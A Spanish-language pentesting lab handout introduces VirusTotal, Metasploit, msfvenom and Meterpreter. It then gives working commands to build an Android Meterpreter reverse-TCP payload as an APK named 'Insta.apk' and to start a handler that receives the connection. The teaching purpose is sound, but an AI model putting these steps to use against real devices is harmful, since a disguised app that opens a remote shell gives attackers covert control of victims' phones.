Pentesting Android
Pentesting Android
Pentesting Android
PENTESTING ANDROID
INFORMACIÓN IMPORTANTE
Es crucial entender que la información descubierta a través de esto medios debe ser tratada con
responsabilidad y debe ser utilizado únicamente para investigación y propósitos de seguridad
ética.
Página 1 de 8
PENTESTING ANDROID
PENTESTING ANDROID
Instrucciones:
Objetivos
Parte 1: Términos Generales
Parte 2: Instalar Android Studio / Bluestacks
Parte 3: Creación de emulador Android
Parte 4: Preparación de entorno en Kali Linux.
Parte 5: Prueba de aplicación.
Parte 6: Generar reportes.
Recursos necesarios
• 1 PC con MVWare/VirtualBox con máquina virtual de Kali Linux
• Android Studio
• Acceso a internet, de preferencia sin bloqueos a sitios.
Página 2 de 8
PENTESTING ANDROID
Lab 1
Virus Total
Es un servicio en línea gratuito que permite analizar archivos y URLs en busca de virus, malware y otras
amenazas. El análisis se realiza utilizando múltiples motores antivirus y herramientas de detección de
malware de diferentes proveedores de seguridad.
Características Principales de VirusTotal:
1. Escaneo Multimotor:
• VirusTotal utiliza decenas de motores antivirus y herramientas de detección de malware para
analizar archivos y URLs, proporcionando un análisis exhaustivo desde múltiples perspectivas.
2. Subida de Archivos y URLs:
• Los usuarios pueden subir archivos (hasta un cierto límite de tamaño) y enviar URLs para que
sean escaneados en busca de amenazas.
3. Informes Detallados:
• Una vez completado el análisis, VirusTotal proporciona un informe detallado que incluye los
resultados de cada motor antivirus, así como información adicional sobre el archivo o URL, como
su comportamiento y metadatos.
4. Detección de Amenazas en Tiempo Real:
• VirusTotal permite la detección en tiempo real de nuevas amenazas gracias a su amplia base de
datos de malware y la continua actualización de los motores antivirus.
5. API para Integración:
• VirusTotal ofrece una API que permite a desarrolladores integrar sus capacidades de escaneo en
aplicaciones y sistemas personalizados.
6. Inteligencia de Amenazas:
• Además de escanear archivos y URLs, VirusTotal proporciona información sobre la prevalencia y
distribución de malware, así como inteligencia sobre nuevas amenazas emergentes.
https://www.virustotal.com/gui/home/upload
Página 3 de 8
PENTESTING ANDROID
Metasploit
Es un marco de trabajo de código abierto utilizado principalmente para pruebas de penetración y evaluación
de la seguridad de sistemas informáticos. Desarrollado por H. D. Moore y mantenido por Rapid7, Metasploit
proporciona una plataforma robusta para desarrollar, probar y ejecutar exploits contra sistemas vulnerables.
Es una herramienta esencial para profesionales de la seguridad, ya que les permite identificar, validar y
remediar vulnerabilidades de manera eficaz.
Componentes de Metasploit:
1. Msfconsole:
• Es la interfaz principal de Metasploit. Permite a los usuarios interactuar con Metasploit utilizando
comandos.
2. Msfvenom:
• Herramienta para generar y codificar payloads. Combina las funcionalidades de msfpayload y
msfencode.
3. Metasploit Framework:
• El núcleo del proyecto, incluye todos los módulos, exploits, payloads y herramientas auxiliares.
4. Metasploit Pro:
• Versión comercial con características avanzadas como gestión de pruebas de penetración,
explotación automatizada y generación de informes.
MSVENOM
Es una herramienta utilizada en pruebas de penetración y evaluaciones de seguridad para generar payloads
maliciosos que pueden ser utilizados para comprometer sistemas. Forma parte del proyecto Metasploit, una
suite de herramientas de código abierto diseñada para explotar vulnerabilidades de software.
Características y Usos Principales de MSVENOM:
1. Generación de Payloads: MSVENOM permite crear payloads (códigos maliciosos) en diversos formatos
como ejecutables, scripts, archivos de oficina, y más. Estos payloads pueden ser usados para ejecutar
comandos, abrir sesiones remotas, o realizar otras acciones maliciosas en un sistema objetivo.
2. Combinación de Funcionalidades: Integra las funciones de msfencode y msfpayload, herramientas
antiguas del proyecto Metasploit, en una sola utilidad. Esto facilita la creación y la codificación de
payloads en un solo paso.
3. Variedad de Formatos: Soporta una amplia variedad de formatos de salida, como EXE, APK, ASP,
PHP, entre otros, permitiendo a los testers de penetración adaptar el payload al entorno específico del
objetivo.
4. Codificación y Ofuscación: Permite codificar y ofuscar los payloads para evitar la detección por parte
de programas antivirus y otros mecanismos de seguridad.
5. Compatibilidad: Funciona en múltiples sistemas operativos, incluyendo Windows, Linux y macOS, lo
cual permite su uso en una variedad de entornos y plataformas.
Página 4 de 8
PENTESTING ANDROID
Meterpreter
Es un payload avanzado utilizado dentro del framework Metasploit, una herramienta ampliamente usada para
pruebas de penetración y evaluación de seguridad. Desarrollado por H. D. Moore, Meterpreter proporciona un
entorno interactivo y extensible que permite al atacante ejecutar comandos y scripts directamente en el sistema
comprometido. Su diseño modular y en memoria lo hace difícil de detectar y analizar.
Un Payload
Es un término utilizado en el contexto de la seguridad informática y el hacking para referirse a la parte de un
exploit que realiza la acción maliciosa en un sistema objetivo. El payload se introduce a través de una
vulnerabilidad en el sistema y, una vez dentro, ejecuta una tarea específica diseñada por el atacante.
Página 5 de 8
PENTESTING ANDROID
Ventana 1
Verificar nuestra IP
Ventana 2
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.x LPORT=4444 R > Insta.apk
Explicación:
1. Ejecutar el Comando con Privilegios: sudo asegura que el comando se ejecuta con los permisos
necesarios, lo cual puede ser requerido dependiendo del entorno y las configuraciones de tu sistema.
2. Generar el Payload: msfvenom crea un payload Meterpreter que establecerá una conexión inversa
desde el dispositivo Android al host atacante.
3. Configurar IP y Puerto: LHOST y LPORT configuran la dirección IP y el puerto donde el dispositivo
comprometido intentará conectarse.
4. Especificar el Formato: La opción R indica que se debe generar el payload en formato raw, que se
redirigirá a un archivo APK.
5. Redirigir la Salida: > redirige la salida generada a un archivo llamado Insta.apk, creando así un archivo
APK que, al ser instalado y ejecutado en un dispositivo Android, intentará conectarse al host atacante.
Página 6 de 8
PENTESTING ANDROID
Ventana 3
Ejecutar Metasploit
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.64.2
set LPORT 4444
exploit
Desglose de Comandos:
1. use exploit/multi/handler:
• Este comando selecciona el módulo de Metasploit llamado multi/handler. Este módulo es un
listener genérico que puede manejar conexiones entrantes desde varios tipos de payloads.
2. set payload android/meterpreter/reverse_tcp:
• Configura el tipo de payload que se va a manejar. En este caso, se está utilizando un payload
meterpreter para Android que establece una conexión inversa (reverse TCP). Esto significa que,
cuando el payload se ejecuta en el dispositivo Android, intentará conectarse de vuelta al host que
está ejecutando el listener.
3. set LHOST 192.168.64.2:
• Configura la dirección IP local del host atacante, es decir, la máquina que está ejecutando
Metasploit y que recibirá la conexión entrante desde el dispositivo Android comprometido. Debes
reemplazar 192.168.64.2 con la dirección IP de tu máquina.
4. set LPORT 4444:
Página 7 de 8
PENTESTING ANDROID
• Configura el puerto en el que el host atacante escuchará las conexiones entrantes. En este caso,
se ha configurado el puerto 4444. Puedes cambiarlo a cualquier puerto que esté abierto y
disponible en tu máquina.
5. exploit:
• Inicia el listener. Metasploit ahora estará esperando conexiones entrantes en la dirección IP y el
puerto especificados. Cuando el dispositivo Android comprometido ejecute el payload generado,
intentará conectarse a este listener, estableciendo una sesión interactiva de Meterpreter.
Generar Reportes.
Página 8 de 8